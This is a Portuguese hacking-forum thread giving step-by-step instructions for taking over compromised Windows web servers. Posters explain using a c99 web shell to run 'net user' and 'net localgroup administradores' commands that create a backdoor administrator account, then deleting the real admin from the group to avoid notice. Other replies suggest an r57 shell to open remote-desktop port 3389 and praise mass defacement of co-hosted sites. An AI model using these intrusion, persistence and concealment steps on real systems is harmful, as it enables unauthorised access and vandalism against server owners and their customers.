Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

Adquirindo acesso r00t em Servidor Windows

Collapse
X
 
  • Filter
  • Tempo
  • Show
Clear All
new posts

  • Font Size
    #16
    muito bom exploit!

    Comment


    • Font Size
      #17
      você vai executar o comando "net user" la na shell c99, tem uma caixa para executar comandos nesta shell.

      se não me engano fica dentro de uma tabela na primeira célula "Command execute"

      sei que isto foi perguntado a muito tempo, e talvez ja tenha cido respondido por pm mas isso pode ajudar outras pessoas
      root@bt:~# cat solitude

      ###############################

      Twitter > S0litud3_
      Mail > key01x10[at]live[dot]com

      ###############################

      root@bt:~#

      Comment


      • Font Size
        #18
        Bom turo mas tenho uma duvida podem me chamar de ignorante mas nigem nasce sabendo !
        O servidor que o Exploit se refere e tipo aki tem um provedor de Internet e mesmo tem um site eu devo upa a shell c99 para dentro do site ? mas para iso eu tenho que ter acesso root não é ?n entedi mas nada :S
        "As pessoas que vencem neste mundo são as que procuram as circunstâncias de que precisam e, quando não as encontram, as criam."

        Comment


        • Font Size
          #19
          Bom turo mas tenho uma duvida podem me chamar de ignorante mas nigem nasce sabendo !
          O servidor que o Exploit se refere e tipo aki tem um provedor de Internet e mesmo tem um site eu devo upa a shell c99 para dentro do site ? mas para iso eu tenho que ter acesso root não é ?n entedi mas nada :S
          Não amigo, você quase acertou, foi por pouco campeão.
          Você nao é ignorante, você brilha, acredite em sí e vá em frente. Agora vamos responder sua pergunta.

          Servidor = É um computador no qual o site fica hospedado.
          Sim, você tera que explorar o site e upar uma shellcode nele, apos isso você TERA QUE ADQUIRIR ROOT NO SERVIDOR, mas para adquirir root você tera que fazer igual a receita de bolo de nosso amigo #expl0it postou logo a cima.
          Porque ter root no sitema ? Root é usuario Deus no linux, e no windows é ADMINISTRADOR.
          Quando você tem uma shell hospedada no site , você tem acesso limitado a pastas e conteudos do mesmo, e adquirindo root, voce tera acesso a toda a maquina do servidor.
          Ou seja, nesta mesma maquina se nao for dedicado , podera haver 200 sites ... voce pode faze um MASS DEFACE, ai fica por sua conta .
          Respondi sua pergunta ? qualquer coisa posta ai, abraço
          Nao Participa ainda ?
          * Comunidade Elite Defacer


          Elite Defacer
          Hackeralp - 5ubZer0 - $cr34m()

          Comment


          • Font Size
            #20
            Adquirindo r00t em Servidor Windows

            Ayer hubo un catacrack en el servidor y el foro no funcionó durante todo el dia y la noche pasada.

            Esta mañana ya se puede acceder al foro aunque aún se está intentando solucionar todo...por eso la configuración del foro no es la correcta.

            Esperamos que la marcha normal y correcta del foro no se demore demasiado.

            Disculpad las molestias.

            Saludos.
            bulk email verification tool

            Comment


            • Font Size
              #21
              eu queria saber, como eu vo saber o login ?

              pra fazer a conexão remota?

              Comment


              • Font Size
                #22
                Postado Originalmente por #d0nz4 Ver Post
                eu queria saber, como eu vo saber o login ?

                pra fazer a conexão remota?
                Simples...
                Código:
                net user exploit exploit /add
                Veja esta parte, ele colocou explot exploit, o comando net user serve para criar/editar uma conta de usuário no computador. Temos então o seguinte:
                net user [login] [senha]
                Novamente o exemplo do Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar..., net user explot(login) exploit(senha).
                Espero que tenha intendido
                <team>
                Aqui jaz um time.

                </team>

                Comment


                • Font Size
                  #23
                  @#Expl0it

                  Amigo desta forma vc está deletando a conta do administrador do pc ou criando uma outra e entrando na que criou? E queria saber tbm uma forma de fazer isso sem o administrador perceber (não to falando de apagar logs) e sim de criar uma conta e entrar no pc e pegar usuário e senha do administrador e depois apagar a conta que vc fez e entrar na conta do administrador sem ele perceber. Isso derrubaria o administrador do pc caso o mesmo esteja logado?

                  exemplo: - admin logado na conta do administrador
                  - vc vai e pega senha e entra na mesma conta o que acontece? ele cai?

                  Por isso criou um novo usuário?

                  Obrigado!

                  Comment


                  • Font Size
                    #24
                    E pra acrescentar se conseguirem uma shell no caso a c99 de algum site Windows e não tiver acesso remoto é só hospedar outro exploit (r57) e abrir a porta 3389 ou a que quiser.

                    Comment


                    • Font Size
                      #25
                      Maikel

                      téndeio vlww sz

                      Comment


                      • Font Size
                        #26
                        parece muito interessante, vou testar aki.
                        Valeu obrigado por compartilhar.

                        Comment


                        • Font Size
                          #27
                          Postado Originalmente por sn3f4 Ver Post
                          @#Expl0it

                          Amigo desta forma vc está deletando a conta do administrador do pc ou criando uma outra e entrando na que criou? E queria saber tbm uma forma de fazer isso sem o administrador perceber (não to falando de apagar logs) e sim de criar uma conta e entrar no pc e pegar usuário e senha do administrador e depois apagar a conta que vc fez e entrar na conta do administrador sem ele perceber. Isso derrubaria o administrador do pc caso o mesmo esteja logado?

                          exemplo: - admin logado na conta do administrador
                          - vc vai e pega senha e entra na mesma conta o que acontece? ele cai?

                          Por isso criou um novo usuário?

                          Obrigado!

                          Código:
                           net user exploit exploit /add
                          Irá aparecer a mensagem "Comando concluído com Exito". Agora sim temos uma conta de usuário no servidor, mas só como usuário não vamos poder acessar, então para adicionar o usuário 'exploit' para o grupo de Administradores do Servidor precisamos executar o seguinte comando:

                          Código:
                           net localgroup administradores exploit /add
                          Pronto agora você é Administrador do Servidor, mas os antigos usuários irão ficar e talvez o Administrador do Server perceba a nova conta, então vamos deletar ele (:
                          Código:
                           net localgroup administradores admin /delet
                          sn3f4, como foi dito pelo #Expl0it você vai estar criando uma conta e colocando ela para administrador.
                          Ele comentou que o admin do site pode descobrir que você criou uma conta e deu previlegios de administrador para ela, então ele usou o comando para deletar a conta do admin.

                          Abraço




                          "Antes de conseguir você tem que acreditar."

                          Comment

                          X
                          Working...
                          X